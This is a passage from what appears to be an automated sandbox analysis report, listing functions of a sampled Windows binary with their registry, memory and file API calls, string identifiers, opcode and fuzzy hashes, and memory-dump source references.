                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4081037667-3301834661
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d7ebf19dc54841a91d8a5d624eaac156eade648abef84b2db18b980c6032974d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D71A322B0974286EB20AB59EC602BBE2A1FF85794FC84531DF4E07794DF3CE6418720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDAA85
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDAACF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EDAAEC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF706ED98C0), ref: 00007FF706EDAB39
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF706ED98C0), ref: 00007FF706EDAB6F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF706ED98C0), ref: 00007FF706EDABA4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF706ED98C0), ref: 00007FF706EDABCB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1019019434-1087296587
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5ceb17f866f4daba16a50a38e2b2683f520bcde2eb45c1f69a3fa242514898d1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6519231B08B4686E760AB69EC6477BB6A1FF89790F849234CB4D83794DF3DD5428710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB1884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: COPYCMD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2429825313-3727491224
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f7690b631fe4a497929ad1ff36404649eca3189cd9b36e3ecc69e06a31ca435d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF19E22E087428AFB60AF519C706BFB2A1BF147A8F985235CE5D236D4DF3CA545C760
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB4A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$FullNamePathwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4289998964-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e561addf3608eafd9ded1b77752c08a78dcd93d3eac3eb33e1bac91af3e1d316
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAC1CF21A0D35A86EAA4BB519D6877FA3A0FF45B90F885530CF1E077D5EF3CA5918220
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDBCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3476366620-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd8846b952ef2c08dea24ff2da81df1dd8e123bfe33540731bc99edc668aef6a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB21FF64D18B4296EA147B20EC352BAEB50FF5A725FC55275C55E432E1EF3CA4098620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC9584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f72dfefdf5011b3028fc034f3d307f8fd72113e8aa689e50ff523ab22f3dc14e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40112126604F418AEF00EF64EC541AA73A4FF1975CF840A34EA6D47B94EF7CD5A58350
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB3D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %9d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1006866328-2241623522
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0ba224ea9fe0feec8fc16a1c666c93e0056ca12c4cc76d146313a4b484e72553
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3516D72A087428BF700AF11EC641AABBA4FF547A8FC14635DA6D537A5CF3CE5048B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB8DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8db04288ed107766bfc1d2b138592c3f7d1e764856ac6e1144aefb2658edad86
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DC10522E0978686EB61EB20EC60AFBA3A4FF95794F845235DB1D07795DF3CE5418320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB9B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 95bd1373d40f1bf5b067444393cd3d3e6914878c3e236b2ff1cb689f428243e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0A1B321A1874286EB20BB25AC6167BB6E0FF99B90FD15235DE4E47796DF3CE401C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDFB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %5lu
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448137811-2100233843
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e43d950d8196c44844f01b920a81d61f4065bd43d658c730bd1d2ed66f9c3c7e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7417C26608BC685EB61EF61EC606EBA360FF84788F848031EA4D0BB58DF7CD149C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBD250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
